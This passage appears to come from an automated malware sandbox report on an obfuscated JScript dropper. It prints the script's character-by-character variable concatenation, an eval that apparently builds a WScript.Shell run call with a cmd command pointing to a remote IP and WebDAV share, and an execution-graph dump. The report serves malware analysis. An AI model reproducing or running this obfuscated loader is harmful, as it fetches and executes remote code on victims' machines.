ofjnsbxia + zxqbq + acrinokm + yptqmnxq + mclcpkxr + jvaxx + ktqhqp + cblmmvh + acrinokm + conprmvk + cblmmvh + djwmv + oindqeulx + mwncmi + acrinokm + yptqmnxq + mclcpkxr + jvaxx + ktqhqp + cblmmvh + acrinokm + jvaxx + jqskgadc + yptqmnxq + qxdyfx + oindqeulx + mcyra + yptqmnxq + acrinokm + qtwic + conprmvk + gbeabu + mcyra + ofjnsbxia + zxqbq + acrinokm + conprmvk + cblmmvh + djwmv + oindqeulx + mwncmi + acrinokm + zxqbq + jqskgadc + eoztg + ofjnsbxia + gbeabu + mclcpkxr + ktqhqp + acrinokm + qxdyfx + ofjnsbxia + qtwic + zxqbq + yptqmnxq + yptqmnxq + mcyra + hfgkhke + acrinokm + qxdyfx + ofjnsbxia + qtwic + zxqbq + yptqmnxq + yptqmnxq + mcyra + hfgkhke + acrinokm + qxdyfx + ofjnsbxia + qtwic + zxqbq + yptqmnxq + yptqmnxq + mcyra + hfgkhke + acrinokm + qxdyfx + ofjnsbxia + qtwic + zxqbq + yptqmnxq + yptqmnxq + mcyra + hfgkhke + acrinokm + ofjnsbxia + iqkshjqkp + djwmv + djwmv + mcyra + acrinokm + mclcpkxr + gebyyu + tqyfu + jqskgadc + ofjnsbxia + acrinokm + ofjnsbxia + gbeabu + zxqbq + djwmv + smafnpnc + yptqmnxq + iqkshjqkp + zsthedrh + acrinokm + jqskgadc + mclcpkxr + zsthedrh + jvaxx + eoztg + oindqeulx + mclcpkxr + zsthedrh + djwmv + acrinokm + gebyyu + mclcpkxr + woscoo + cblmmvh + mcyra + acrinokm + gebyyu + mclcpkxr + woscoo + cblmmvh + mcyra + acrinokm + gebyyu + mclcpkxr + woscoo + cblmmvh + mcyra + acrinokm + jvaxx + yptqmnxq + conprmvk + cblmmvh + zxqbq + djwmv + zxqbq + ofjnsbxia + acrinokm + hdgtouue + ktqhqp + hfgkhke + conprmvk + ktqhqp + mcyra + acrinokm + hdgtouue + ktqhqp + hfgkhke + conprmvk + ktqhqp + mcyra + acrinokm + hdgtouue + hfgkhke + ktqhqp + woscoo + woscoo + mcyra + acrinokm + ofjnsbxia + iqkshjqkp + djwmv + djwmv + mcyra + acrinokm + conprmvk + cblmmvh + djwmv + oindqeulx + mwncmi + acrinokm + iqkshjqkp + qtwic + mclcpkxr + tqyfu + oindqeulx + ywkps + gebyyu + zxqbq + gebyyu + acrinokm + mwncmi + gebyyu + ofjnsbxia + gebyyu + hdgtouue + acrinokm + qtwic + conprmvk + gbeabu + mcyra + ofjnsbxia + zxqbq + acrinokm + iqkshjqkp + qtwic + mclcpkxr + tqyfu + oindqeulx + ywkps + gebyyu + zxqbq + gebyyu + acrinokm + conprmvk + cblmmvh + djwmv + oindqeulx + mwncmi + acrinokm + eoztg + iqkshjqkp + qxdyfx + gbeabu + smafnpnc + mclcpkxr + tqyfu + mclcpkxr + jqskgadc + acrinokm + jvaxx + jqskgadc + yptqmnxq + qxdyfx + oindqeulx + mcyra + yptqmnxq + acrinokm + yptqmnxq + ktqhqp + qtwic + zxqbq + gbeabu + cblmmvh + ofjnsbxia + ywkps + hfgkhke + acrinokm + eoztg + iqkshjqkp + qxdyfx + gbeabu + smafnpnc + mclcpkxr + tqyfu + mclcpkxr + jqskgadc + acrinokm + jvaxx + jqskgadc + yptqmnxq + qxdyfx + oindqeulx + mcyra + yptqmnxq + acrinokm + qtwic + conprmvk + gbeabu + mcyra + ofjnsbxia + zxqbq + acrinokm + qxdyfx + ofjnsbxia + qtwic + zxqbq + yptqmnxq + yptqmnxq + mcyra + hfgkhke + acrinokm + eoztg + iqkshjqkp + qxdyfx + gbeabu + smafnpnc + mclcpkxr + tqyfu + mclcpkxr + jqskgadc + acrinokm + qtwic + conprmvk + gbeabu + mcyra + ofjnsbxia + zxqbq + acrinokm + yptqmnxq + mclcpkxr + jvaxx + ktqhqp + cblmmvh + acrinokm + mclcpkxr + gebyyu + tqyfu + jqskgadc + ofjnsbxia + acrinokm + yptqmnxq + tqyfu + zxqbq + ofjnsbxia + yptqmnxq + jqskgadc + acrinokm + yptqmnxq + tqyfu + zxqbq + ofjnsbxia + yptqmnxq + jqskgadc + jxhwrfv + ltctg + jxhwrfv + cblmmvh + conprmvk + mwncmi + jvaxx + hfgkhke + jrzvb + nbgxvy );
                • eval("this[ndffv+dtapbpy+ofjnsbxia+smafnpnc+jqskgadc+djwmv+gebyyu][bixuqcaf+smafnpnc+hfgkhke+conprmvk+gebyyu+hfgkhke+osbypk+ktqhqp+oindqeulx+hfgkhke+ofjnsbxia+gebyyu](ndffv+dtapbpy+ofjnsbxia+smafnpnc+jqskgadc+djwmv+gebyyu+mqsbf+dtapbpy+eoztg+hfgkhke+mwncmi+mwncmi)[smafnpnc+mcyra+zxqbq](ofjnsbxia+yptqmnxq+qtwic+acrmleeem+huvqwire+ofjnsbxia+acrmleeem+ofjnsbxia+yptqmnxq+qtwic+acrmleeem+huvqwire+ofjnsbxia+acrmleeem+zxqbq+hfgkhke+gebyyu+acrmleeem+mcyra+jvaxx+hfgkhke+acrmleeem+cvppu+cvppu+afpjl+rbiylx+daoucn+mqsbf+afpjl+vdqwjztnt+daoucn+mqsbf+afpjl+mqsbf+simxjum+daoucn+afpjl+nihcoqb+xcdnmmue+xcdnmmue+xcdnmmue+xcdnmmue+cvppu+qtwic+conprmvk+iqkshjqkp+tqyfu+tqyfu+tqyfu+smafnpnc+gbeabu+gbeabu+gebyyu+cvppu+qovxi+qovxi+ofjnsbxia+yptqmnxq+qtwic+acrmleeem+huvqwire+ofjnsbxia+acrmleeem+smafnpnc+hfgkhke+hdgtouue+jvaxx+iqkshjqkp+smafnpnc+daoucn+simxjum+acrmleeem+huvqwire+jvaxx+acrmleeem+cvppu+cvppu+afpjl+rbiylx+daoucn+mqsbf+afpjl+vdqwjztnt+daoucn+mqsbf+afpjl+mqsbf+simxjum+daoucn+afpjl+nihcoqb+xcdnmmue+xcdnmmue+xcdnmmue+xcdnmmue+cvppu+qtwic+conprmvk+iqkshjqkp+tqyfu+tqyfu+tqyfu+smafnpnc+gbeabu+gbeabu+gebyyu+cvppu+afpjl+vdqwjztnt+ltctg+daoucn+vdqwjztnt+afpjl+hvxorqwqi+simxjum+mbdnofcze+hvxorqwqi+simxjum+daoucn+xcdnmmue+hvxorqwqi+daoucn+mqsbf+qtwic+mwncmi+mwncmi,0,false);") ➔ 0
                2
                }
                  3
                  ktqhqp = "F";
                    4
                    ktqhqp = "b";
                      5
                      afpjl = "x";
                        6
                        afpjl = "Y";
                          7
                          afpjl = "r";
                            8
                            afpjl = "1";
                              9
                              nihcoqb = "@";
                                10
                                hvxorqwqi = "i";
                                  11
                                  hvxorqwqi = "G";
                                    12
                                    hvxorqwqi = "p";
                                      13
                                      hvxorqwqi = "z";
                                        14
                                        hvxorqwqi = "6";
                                          15
                                          xqqrniwzz = "A";
                                            16
                                            xqqrniwzz = "[";
                                              17
                                              conprmvk = "a";
                                                18
                                                daoucn = "3";
                                                  19
                                                  slaxzev = "]";
                                                    20
                                                    tqyfu = "l";
                                                      21
                                                      tqyfu = "x";
                                                        22
                                                        tqyfu = "w";
                                                          23
                                                          qxdyfx = "x";
                                                            24
                                                            vdqwjztnt = "4";
                                                              25
                                                              djwmv = "y";
                                                                26
                                                                djwmv = "P";
                                                                  27
                                                                  djwmv = "p";
                                                                    28
                                                                    nbgxvy = ";";
                                                                      29
                                                                      cblmmvh = "i";
                                                                        30
                                                                        cblmmvh = "i";
                                                                          31
                                                                          cblmmvh = "w";
                                                                            32
                                                                            cblmmvh = "f";
                                                                              33
                                                                              jrzvb = ")";
                                                                                34
                                                                                zxqbq = "n";
                                                                                  35
                                                                                  ywkps = "f";
                                                                                    36
                                                                                    ywkps = "z";
                                                                                      37
                                                                                      ndffv = "P";
                                                                                        38
                                                                                        ndffv = "j";
                                                                                          39
                                                                                          ndffv = "W";
                                                                                            40
                                                                                            mbdnofcze = "K";
                                                                                              41
                                                                                              mbdnofcze = "t";
                                                                                                42
                                                                                                mbdnofcze = "G";
                                                                                                  43
                                                                                                  mbdnofcze = "h";
                                                                                                    44
                                                                                                    mbdnofcze = "5";
                                                                                                      45
                                                                                                      hdgtouue = "g";
                                                                                                        46
                                                                                                        mcyra = "o";
                                                                                                          47
                                                                                                          mcyra = "a";
                                                                                                            48
                                                                                                            mcyra = "b";
                                                                                                              49
                                                                                                              mcyra = "k";
                                                                                                                50
                                                                                                                mcyra = "u";
                                                                                                                  51
                                                                                                                  iqkshjqkp = "D";
                                                                                                                    52
                                                                                                                    iqkshjqkp = "Z";
                                                                                                                      53
                                                                                                                      iqkshjqkp = "y";
                                                                                                                        54
                                                                                                                        iqkshjqkp = "v";
                                                                                                                          55
                                                                                                                          jxhwrfv = ",";
                                                                                                                            56
                                                                                                                            smafnpnc = "r";
                                                                                                                              57
                                                                                                                              mqsbf = "e";
                                                                                                                                58
                                                                                                                                mqsbf = "l";
                                                                                                                                  59
                                                                                                                                  mqsbf = ".";
                                                                                                                                    60
                                                                                                                                    gbeabu = "e";
                                                                                                                                      61
                                                                                                                                      gbeabu = "s";
                                                                                                                                        62
                                                                                                                                        gbeabu = "O";
                                                                                                                                          63
                                                                                                                                          gbeabu = "E";
                                                                                                                                            64
                                                                                                                                            gbeabu = "o";
                                                                                                                                              65
                                                                                                                                              mclcpkxr = "d";
                                                                                                                                                66
                                                                                                                                                mclcpkxr = "W";
                                                                                                                                                  67
                                                                                                                                                  mclcpkxr = "K";
                                                                                                                                                    68
                                                                                                                                                    mclcpkxr = "l";
                                                                                                                                                      69
                                                                                                                                                      mclcpkxr = "q";
                                                                                                                                                        70
                                                                                                                                                        woscoo = "n";
                                                                                                                                                          71
                                                                                                                                                          woscoo = "f";
                                                                                                                                                            72
                                                                                                                                                            woscoo = "p";
                                                                                                                                                              73
                                                                                                                                                              woscoo = "s";
                                                                                                                                                                74
                                                                                                                                                                woscoo = "y";
                                                                                                                                                                  75
                                                                                                                                                                  cvppu = "d";
                                                                                                                                                                    76
                                                                                                                                                                    cvppu = "j";
                                                                                                                                                                      77
                                                                                                                                                                      cvppu = "z";
                                                                                                                                                                        78
                                                                                                                                                                        cvppu = "\\";
                                                                                                                                                                          79
                                                                                                                                                                          dtapbpy = "k";
                                                                                                                                                                            80
                                                                                                                                                                            dtapbpy = "M";
                                                                                                                                                                              81
                                                                                                                                                                              dtapbpy = "Z";
                                                                                                                                                                                82
                                                                                                                                                                                dtapbpy = "l";
                                                                                                                                                                                  83
                                                                                                                                                                                  dtapbpy = "S";
                                                                                                                                                                                    84
                                                                                                                                                                                    qovxi = "N";
                                                                                                                                                                                      85
                                                                                                                                                                                      qovxi = "z";
                                                                                                                                                                                        86
                                                                                                                                                                                        qovxi = "T";
                                                                                                                                                                                          87
                                                                                                                                                                                          qovxi = "I";
                                                                                                                                                                                            88
                                                                                                                                                                                            qovxi = "&";
                                                                                                                                                                                              89
                                                                                                                                                                                              yzkeee = "(";
                                                                                                                                                                                                90
                                                                                                                                                                                                osbypk = "G";
                                                                                                                                                                                                  91
                                                                                                                                                                                                  osbypk = "O";
                                                                                                                                                                                                    92
                                                                                                                                                                                                    acrinokm = "P";
                                                                                                                                                                                                      93
                                                                                                                                                                                                      acrinokm = "J";
                                                                                                                                                                                                        94
                                                                                                                                                                                                        acrinokm = "j";
                                                                                                                                                                                                          95
                                                                                                                                                                                                          acrinokm = "q";
                                                                                                                                                                                                            96
                                                                                                                                                                                                            acrinokm = "+";
                                                                                                                                                                                                              97
                                                                                                                                                                                                              eoztg = "h";
                                                                                                                                                                                                                98
                                                                                                                                                                                                                huvqwire = "o";
                                                                                                                                                                                                                  99
                                                                                                                                                                                                                  huvqwire = "A";
                                                                                                                                                                                                                    100
                                                                                                                                                                                                                    huvqwire = "B";
                                                                                                                                                                                                                      101
                                                                                                                                                                                                                      huvqwire = "/";
                                                                                                                                                                                                                        102
                                                                                                                                                                                                                        ltctg = "t";
                                                                                                                                                                                                                          103
                                                                                                                                                                                                                          ltctg = "o";
                                                                                                                                                                                                                            104
                                                                                                                                                                                                                            ltctg = "R";
                                                                                                                                                                                                                              105
                                                                                                                                                                                                                              ltctg = "0";
                                                                                                                                                                                                                                106
                                                                                                                                                                                                                                mwncmi = "l";
                                                                                                                                                                                                                                  107
                                                                                                                                                                                                                                  mwncmi = "T";
                                                                                                                                                                                                                                    108
                                                                                                                                                                                                                                    mwncmi = "l";
                                                                                                                                                                                                                                      109
                                                                                                                                                                                                                                      oindqeulx = "i";
                                                                                                                                                                                                                                        110
                                                                                                                                                                                                                                        oindqeulx = "L";
                                                                                                                                                                                                                                          111
                                                                                                                                                                                                                                          oindqeulx = "X";
                                                                                                                                                                                                                                            112
                                                                                                                                                                                                                                            oindqeulx = "R";
                                                                                                                                                                                                                                              113
                                                                                                                                                                                                                                              oindqeulx = "j";
                                                                                                                                                                                                                                                114
                                                                                                                                                                                                                                                jvaxx = "H";
                                                                                                                                                                                                                                                  115
                                                                                                                                                                                                                                                  jvaxx = "s";
                                                                                                                                                                                                                                                    116
                                                                                                                                                                                                                                                    ofjnsbxia = "K";
                                                                                                                                                                                                                                                      117
                                                                                                                                                                                                                                                      ofjnsbxia = "c";
                                                                                                                                                                                                                                                        118
                                                                                                                                                                                                                                                        jqskgadc = "b";
                                                                                                                                                                                                                                                          119
                                                                                                                                                                                                                                                          jqskgadc = "F";
                                                                                                                                                                                                                                                            120
                                                                                                                                                                                                                                                            jqskgadc = "P";
                                                                                                                                                                                                                                                              121
                                                                                                                                                                                                                                                              jqskgadc = "i";
                                                                                                                                                                                                                                                                122
                                                                                                                                                                                                                                                                rbiylx = "L";
                                                                                                                                                                                                                                                                  123
                                                                                                                                                                                                                                                                  rbiylx = "9";
                                                                                                                                                                                                                                                                    124
                                                                                                                                                                                                                                                                    qtwic = "d";
                                                                                                                                                                                                                                                                      125
                                                                                                                                                                                                                                                                      qtwic = "i";
                                                                                                                                                                                                                                                                        126
                                                                                                                                                                                                                                                                        qtwic = "d";
                                                                                                                                                                                                                                                                          127
                                                                                                                                                                                                                                                                          yptqmnxq = "m";
                                                                                                                                                                                                                                                                            128
                                                                                                                                                                                                                                                                            hfgkhke = "e";
                                                                                                                                                                                                                                                                              129
                                                                                                                                                                                                                                                                              simxjum = "2";
                                                                                                                                                                                                                                                                                130
                                                                                                                                                                                                                                                                                xcdnmmue = "8";
                                                                                                                                                                                                                                                                                  131
                                                                                                                                                                                                                                                                                  bixuqcaf = "C";
                                                                                                                                                                                                                                                                                    132
                                                                                                                                                                                                                                                                                    gebyyu = "Q";
                                                                                                                                                                                                                                                                                      133
                                                                                                                                                                                                                                                                                      gebyyu = "t";
                                                                                                                                                                                                                                                                                        134
                                                                                                                                                                                                                                                                                        zsthedrh = "k";
                                                                                                                                                                                                                                                                                          135
                                                                                                                                                                                                                                                                                          acrmleeem = "z";
                                                                                                                                                                                                                                                                                            136
                                                                                                                                                                                                                                                                                            acrmleeem = "N";
                                                                                                                                                                                                                                                                                              137
                                                                                                                                                                                                                                                                                              acrmleeem = " ";
                                                                                                                                                                                                                                                                                                138
                                                                                                                                                                                                                                                                                                ftewq ( );
                                                                                                                                                                                                                                                                                                • ftewq() ➔ undefined
                                                                                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                  Execution Coverage:2.4%
                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                  Signature Coverage:6.1%
                                                                                                                                                                                                                                                                                                  Total number of Nodes:849
                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:4
                                                                                                                                                                                                                                                                                                  execution_graph 7860 24f6a0a 7861 24ee49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7860->7861 7862 24f6a0f __except_validate_context_record 7861->7862 7863 24ee560 _CreateFrameInfo ExitProcess 7862->7863 7864 24f6a42 7863->7864 7866 24f6b2a 7864->7866 7868 24f6a9c 7864->7868 7882 24f6af0 7864->7882 7865 24f6b98 7865->7882 7922 24f6c48 7865->7922 7876 24f6b49 7866->7876 7916 24f1468 7866->7916 7869 24f6b17 7868->7869 7871 24f6abe 7868->7871 7872 24f6af5 7868->7872 7868->7882 7907 24f10fc 7869->7907 7884 24f5de0 7871->7884 7872->7869 7875 24f6acd 7872->7875 7877 24f6c41 7875->7877 7880 24f6adf 7875->7880 7876->7865 7876->7882 7919 24f1494 7876->7919 7879 24ee49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7877->7879 7881 24f6c46 7879->7881 7890 24f5ee4 7880->7890 7885 24f5e40 7884->7885 7886 24ee49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7885->7886 7887 24f5e45 7886->7887 7888 24f5e6a 7887->7888 7889 24f5de0 __GSHandlerCheck_EH ExitProcess 7887->7889 7888->7875 7889->7888 7891 24f1468 Is_bad_exception_allowed ExitProcess 7890->7891 7892 24f5f13 __GetCurrentState 7891->7892 7893 24ee560 _CreateFrameInfo ExitProcess 7892->7893 7904 24f5f30 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 7893->7904 7894 24f6027 7895 24ee560 _CreateFrameInfo ExitProcess 7894->7895 7898 24f602c 7895->7898 7896 24f6062 7897 24ee49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7896->7897 7899 24f6037 7897->7899 7898->7899 7900 24ee560 _CreateFrameInfo ExitProcess 7898->7900 7901 24f6044 __FrameHandler3::GetHandlerSearchState 7899->7901 7902 24ee49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7899->7902 7900->7899 7901->7882 7903 24f606d 7902->7903 7904->7894 7904->7896 7905 24f1468 ExitProcess Is_bad_exception_allowed 7904->7905 7977 24f147c 7904->7977 7905->7904 7980 24f1160 7907->7980 7914 24f5ee4 __FrameHandler3::FrameUnwindToEmptyState 2 API calls 7915 24f1150 7914->7915 7915->7882 7917 24ee560 _CreateFrameInfo ExitProcess 7916->7917 7918 24f1471 7917->7918 7918->7876 7920 24ee560 _CreateFrameInfo ExitProcess 7919->7920 7921 24f149d 7920->7921 7921->7865 7993 24f6070 7922->7993 7924 24ee49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7925 24f7115 7924->7925 7926 24f7060 7928 24f7022 __GSHandlerCheck_EH 7926->7928 7961 24f70a2 7926->7961 8053 24f71ec 7926->8053 7927 24f6d8e 7927->7926 7931 24f6dc6 7927->7931 7929 24ee560 _CreateFrameInfo ExitProcess 7928->7929 7929->7961 7932 24f6f8d 7931->7932 8021 24f1334 7931->8021 7932->7928 7938 24f6fae 7932->7938 7939 24f1468 Is_bad_exception_allowed ExitProcess 7932->7939 7933 24ee560 _CreateFrameInfo ExitProcess 7937 24f6cf5 7933->7937 7935 24f70a9 _log10_special 7935->7882 7937->7935 7940 24ee560 _CreateFrameInfo ExitProcess 7937->7940 7938->7928 7944 24f6fd0 7938->7944 8048 24f10d0 7938->8048 7939->7938 7942 24f6d05 7940->7942 7943 24ee560 _CreateFrameInfo ExitProcess 7942->7943 7945 24f6d0e 7943->7945 7944->7928 7946 24f6fe6 7944->7946 7947 24f70f2 7944->7947 8005 24f14a8 7945->8005 7950 24f6ff1 7946->7950 7951 24f1468 Is_bad_exception_allowed ExitProcess 7946->7951 7948 24ee560 _CreateFrameInfo ExitProcess 7947->7948 7952 24f70f8 7948->7952 7955 24f6490 __GSHandlerCheck_EH ExitProcess 7950->7955 7951->7950 7954 24ee560 _CreateFrameInfo ExitProcess 7952->7954 7956 24f7101 7954->7956 7957 24f7008 7955->7957 7959 24ee300 __GSHandlerCheck_EH ExitProcess 7956->7959 7957->7928 7962 24f1160 __SetUnwindTryBlock ExitProcess 7957->7962 7958 24ee560 _CreateFrameInfo ExitProcess 7960 24f6d50 7958->7960 7959->7961 7960->7927 7964 24ee560 _CreateFrameInfo ExitProcess 7960->7964 7961->7924 7961->7935 7962->7928 7963 24f1494 ExitProcess __GSHandlerCheck_EH 7969 24f6df5 7963->7969 7965 24f6d5c 7964->7965 7967 24ee560 _CreateFrameInfo ExitProcess 7965->7967 7968 24f6d65 7967->7968 8008 24f6490 7968->8008 7969->7932 7969->7963 8027 24f6610 7969->8027 8041 24f7118 7969->8041 7973 24f6d79 8017 24f6580 7973->8017 7975 24ee300 __GSHandlerCheck_EH ExitProcess 7975->7947 7976 24f6d81 __CxxCallCatchBlock std::bad_alloc::bad_alloc __GSHandlerCheck_EH 7976->7975 7978 24ee560 _CreateFrameInfo ExitProcess 7977->7978 7979 24f148a 7978->7979 7979->7904 7981 24f5dd8 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7980->7981 7982 24f111b 7981->7982 7983 24f5dd8 7982->7983 7984 24f5de0 7983->7984 7985 24ee49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7984->7985 7986 24f5e45 7985->7986 7987 24f1129 7986->7987 7988 24f5de0 __GSHandlerCheck_EH ExitProcess 7986->7988 7989 24f106c 7987->7989 7988->7987 7990 24f108c 7989->7990 7991 24f10b7 7989->7991 7990->7991 7992 24ee560 _CreateFrameInfo ExitProcess 7990->7992 7991->7914 7992->7990 7994 24f5dd8 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7993->7994 7995 24f6095 7994->7995 7996 24f1160 __SetUnwindTryBlock ExitProcess 7995->7996 7997 24f60aa 7996->7997 8070 24f5eb8 7997->8070 8000 24f60df 8002 24f5eb8 __GetUnwindTryBlock ExitProcess 8000->8002 8001 24f60bc __FrameHandler3::GetHandlerSearchState 8073 24f5e7c 8001->8073 8003 24f60dd 8002->8003 8003->7927 8003->7933 8003->7961 8006 24ee560 _CreateFrameInfo ExitProcess 8005->8006 8007 24f14b6 8006->8007 8007->7958 8007->7961 8009 24f6577 8008->8009 8016 24f64bb 8008->8016 8010 24ee49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8009->8010 8012 24f657c 8010->8012 8011 24f6557 8011->7927 8011->7973 8013 24f1494 ExitProcess __GSHandlerCheck_EH 8013->8016 8014 24f1468 Is_bad_exception_allowed ExitProcess 8014->8016 8015 24f6610 __GSHandlerCheck_EH ExitProcess 8015->8016 8016->8011 8016->8013 8016->8014 8016->8015 8019 24f65ed 8017->8019 8020 24f659d Is_bad_exception_allowed 8017->8020 8018 24f1468 ExitProcess Is_bad_exception_allowed 8018->8020 8019->7976 8020->8018 8020->8019 8022 24f5dd8 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8021->8022 8023 24f1372 8022->8023 8024 24ee49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8023->8024 8026 24f1380 8023->8026 8025 24f1464 8024->8025 8026->7969 8028 24f663d 8027->8028 8039 24f66cc 8027->8039 8029 24f1468 Is_bad_exception_allowed ExitProcess 8028->8029 8030 24f6646 8029->8030 8031 24f1468 Is_bad_exception_allowed ExitProcess 8030->8031 8032 24f665f 8030->8032 8030->8039 8031->8032 8033 24f668b 8032->8033 8034 24f1468 Is_bad_exception_allowed ExitProcess 8032->8034 8032->8039 8035 24f1494 __GSHandlerCheck_EH ExitProcess 8033->8035 8034->8033 8036 24f669f 8035->8036 8037 24f66b8 8036->8037 8038 24f1468 Is_bad_exception_allowed ExitProcess 8036->8038 8036->8039 8040 24f1494 __GSHandlerCheck_EH ExitProcess 8037->8040 8038->8037 8039->7969 8040->8039 8042 24f1160 __SetUnwindTryBlock ExitProcess 8041->8042 8043 24f7155 8042->8043 8044 24f717b 8043->8044 8076 24f6950 8043->8076 8046 24f1468 Is_bad_exception_allowed ExitProcess 8044->8046 8047 24f718d __GSHandlerCheck_EH 8046->8047 8047->7969 8049 24f5dd8 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8048->8049 8050 24f10e4 8049->8050 8051 24f106c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8050->8051 8052 24f10ee 8051->8052 8052->7944 8054 24f7438 8053->8054 8055 24f7225 8053->8055 8054->7928 8056 24ee560 _CreateFrameInfo ExitProcess 8055->8056 8057 24f722a 8056->8057 8058 24f729c 8057->8058 8064 24ee560 _CreateFrameInfo ExitProcess 8057->8064 8058->8054 8059 24f72bc 8058->8059 8060 24f7453 8058->8060 8061 24f1334 __GSHandlerCheck_EH ExitProcess 8059->8061 8062 24ee49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8060->8062 8068 24f72de 8061->8068 8063 24f7458 8062->8063 8065 24f7259 8064->8065 8065->8058 8108 24f15d8 8065->8108 8067 24f1468 ExitProcess Is_bad_exception_allowed 8067->8068 8068->8054 8068->8067 8069 24f7118 __GSHandlerCheck_EH ExitProcess 8068->8069 8069->8068 8071 24f1160 __SetUnwindTryBlock ExitProcess 8070->8071 8072 24f5ecb 8071->8072 8072->8000 8072->8001 8074 24f1160 __SetUnwindTryBlock ExitProcess 8073->8074 8075 24f5e96 8074->8075 8075->8003 8077 24f6972 8076->8077 8085 24f6750 8077->8085 8079 24f6983 8080 24f6988 __AdjustPointer 8079->8080 8081 24f69c4 __AdjustPointer 8079->8081 8083 24f69a7 __GSHandlerCheck_EH 8080->8083 8084 24f1494 __GSHandlerCheck_EH ExitProcess 8080->8084 8082 24f1494 __GSHandlerCheck_EH ExitProcess 8081->8082 8081->8083 8082->8083 8083->8044 8084->8083 8086 24f677d 8085->8086 8088 24f6786 8085->8088 8087 24f1468 Is_bad_exception_allowed ExitProcess 8086->8087 8087->8088 8089 24f1468 Is_bad_exception_allowed ExitProcess 8088->8089 8090 24f67a5 8088->8090 8094 24f6808 __AdjustPointer __GSHandlerCheck_EH 8088->8094 8089->8090 8091 24f67f0 8090->8091 8092 24f6810 8090->8092 8090->8094 8091->8094 8096 24ee49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8091->8096 8093 24f688f 8092->8093 8092->8094 8095 24f1494 __GSHandlerCheck_EH ExitProcess 8092->8095 8093->8094 8099 24f1494 __GSHandlerCheck_EH ExitProcess 8093->8099 8094->8079 8095->8093 8097 24f6947 8096->8097 8098 24ee49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8097->8098 8100 24f694d 8098->8100 8099->8094 8101 24f6750 __GSHandlerCheck_EH ExitProcess 8100->8101 8102 24f6983 8101->8102 8103 24f69c4 __AdjustPointer 8102->8103 8104 24f6988 __AdjustPointer 8102->8104 8105 24f1494 __GSHandlerCheck_EH ExitProcess 8103->8105 8107 24f69a7 __GSHandlerCheck_EH 8103->8107 8106 24f1494 __GSHandlerCheck_EH ExitProcess 8104->8106 8104->8107 8105->8107 8106->8107 8107->8079 8109 24ee560 _CreateFrameInfo ExitProcess 8108->8109 8110 24f1604 8109->8110 8110->8058 8397 24f6108 8398 24ee560 _CreateFrameInfo ExitProcess 8397->8398 8399 24f613d 8398->8399 8400 24ee560 _CreateFrameInfo ExitProcess 8399->8400 8401 24f614b __except_validate_context_record 8400->8401 8402 24ee560 _CreateFrameInfo ExitProcess 8401->8402 8403 24f618f 8402->8403 8404 24ee560 _CreateFrameInfo ExitProcess 8403->8404 8405 24f6198 8404->8405 8406 24ee560 _CreateFrameInfo ExitProcess 8405->8406 8407 24f61a1 8406->8407 8420 24f14c0 8407->8420 8410 24ee560 _CreateFrameInfo ExitProcess 8411 24f61d1 __CxxCallCatchBlock 8410->8411 8412 24f14fc __CxxCallCatchBlock ExitProcess 8411->8412 8416 24f6282 8412->8416 8413 24f62ab __CxxCallCatchBlock 8414 24ee560 _CreateFrameInfo ExitProcess 8413->8414 8415 24f62be 8414->8415 8417 24ee560 _CreateFrameInfo ExitProcess 8415->8417 8416->8413 8418 24ecde8 __CxxCallCatchBlock ExitProcess 8416->8418 8419 24f62c7 8417->8419 8418->8413 8421 24ee560 _CreateFrameInfo ExitProcess 8420->8421 8422 24f14d1 8421->8422 8423 24f14dc 8422->8423 8424 24ee560 _CreateFrameInfo ExitProcess 8422->8424 8425 24ee560 _CreateFrameInfo ExitProcess 8423->8425 8424->8423 8426 24f14ed 8425->8426 8426->8410 8426->8411 8111 24f6202 8112 24ee560 _CreateFrameInfo ExitProcess 8111->8112 8113 24f620f __CxxCallCatchBlock 8112->8113 8122 24f14fc 8113->8122 8115 24f62ab __CxxCallCatchBlock 8116 24ee560 _CreateFrameInfo ExitProcess 8115->8116 8117 24f62be 8116->8117 8119 24ee560 _CreateFrameInfo ExitProcess 8117->8119 8121 24f62c7 8119->8121 8123 24ee560 _CreateFrameInfo ExitProcess 8122->8123 8124 24f150e 8123->8124 8125 24f1549 8124->8125 8126 24ee560 _CreateFrameInfo ExitProcess 8124->8126 8127 24ee49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8125->8127 8129 24f1519 8126->8129 8128 24f154e 8127->8128 8129->8125 8130 24f1535 8129->8130 8131 24ee560 _CreateFrameInfo ExitProcess 8130->8131 8132 24f153a 8131->8132 8132->8115 8133 24ecde8 8132->8133 8134 24ee560 _CreateFrameInfo ExitProcess 8133->8134 8135 24ecdf6 8134->8135 8135->8115 8354 24fab42 8355 24ee560 _CreateFrameInfo ExitProcess 8354->8355 8356 24fab50 8355->8356 8357 24fab5b 8356->8357 8358 24ee560 _CreateFrameInfo ExitProcess 8356->8358 8358->8357 8136 24f6000 8147 24f5f33 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8136->8147 8137 24f6027 8138 24ee560 _CreateFrameInfo ExitProcess 8137->8138 8140 24f602c 8138->8140 8139 24f6062 8141 24ee49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8139->8141 8142 24f6037 8140->8142 8143 24ee560 _CreateFrameInfo ExitProcess 8140->8143 8141->8142 8144 24f6044 __FrameHandler3::GetHandlerSearchState 8142->8144 8145 24ee49c __FrameHandler3::FrameUnwindToEmptyState 